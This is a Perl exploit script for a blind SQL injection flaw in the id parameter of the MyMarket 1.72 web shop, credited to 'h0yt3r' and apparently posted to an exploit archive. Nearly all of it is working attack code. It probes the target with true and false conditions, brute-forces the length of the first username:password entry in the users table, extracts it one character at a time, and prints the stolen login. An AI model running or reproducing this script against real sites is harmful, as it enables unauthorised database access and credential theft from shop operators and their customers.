#!/usr/bin/perl ###################### # #MyMarket 1.72 Blind SQL Injection Exploit # ###################### # #Bug by: h0yt3r # #Demo: http://mymarket.sourceforge.net/demo/shopping/ # ## ### ## # #http://www.site.de/mymarket/shopping/?id=bluah #Ok when we give $id an unexpected value like this we get an SQL Error. #Union selecting seems not possible... #Exploit needs a valid category id. #The Password is in md5 so exploiting will take an awful lot of time. #You will have to change the content on some sites if there are no categorys. #So I couldnt make it to write a stable expl for all sites using this. # #SQL Injection: #http://[target]/[path]/?id=[SQL] # ####################### # #Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the foreverliving h4ck-y0u Team! # ####################### ####################### use LWP::UserAgent; my $userAgent = LWP::UserAgent->new; usage(); $server = $ARGV[0]; $dir = $ARGV[1]; $id = $ARGV[2]; print"\n"; if (!$id) { die "Read Usage!\n"; } $filename ="index.php"; my $vulnCheck = "http://".$server.$dir.$filename; my $goodSite = $vulnCheck."?id=".$id." and 1=1"; my $badSite = $vulnCheck."?id=".$id." and 1=0"; print"[x]Connecting:"; my $Attack1= $userAgent->get($goodSite); my $Attack2= $userAgent->get($badSite); if($Attack1->is_success) { print " Connected \n"; print "[x]Vulnerable Check: "; ###Will change some times if($Attack1->content !~ m/None /i && $Attack2->content =~ m/None/i) { print "Vulnerable \n"; } else { print "Not Vulnerable"; exit;} } else { print " Connection Failed"; exit; } my $asciiNUM=""; my $length; print "[x]Bruteforcing Length...(if this freezes you have to change the content)\n"; my $lengthCounter = 1; while(1) { my $url = "".$vulnCheck."?id=".$id."%20and%20LENGTH((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1))=".$lengthCounter.""; my $Attack= $userAgent->get($url); my $content = $Attack->content; if($content =~ m/None/i) { $lengthCounter++; } else { $length=$length.$lengthCounter; last; } } my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30","21","23","2B","28","29","40","2D","F5","25","26","2F","3F"); print "[x]Injecting Black Magic...will take SOME time...\n"; for($b=1;$b<=$length;$b++) { for(my $u=0;$u<53;$u++) { my $url = "".$vulnCheck."?id=".$id."%20and%20substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),".$b.",1)=0x".$Daten[$u].""; my $Attack= $userAgent->get($url); my $content = $Attack->content; if($content !~ m/None/i) { print "[x]Found Char ".$Daten[$u]."\n"; $hex=$hex.$Daten[$u]; last; } } } print "[x]Converting \n"; my $a_str = hex_to_ascii($hex); @login = split(/\:/, $a_str); print "[x]Success! \n"; print " Username: $login[0]\n"; print " Password: $login[1]"; sub hex_to_ascii ($) { (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg; return $str; } sub usage() { print q { ###################################################### MyMarket Remote Blind SQL Injection Exploit -Written by h0yt3r- Usage: MyMarket.pl [Server] [Path] [Category ID] Sample: perl MyMarket.pl www.site.com /shopping/ 1 ###################################################### }; }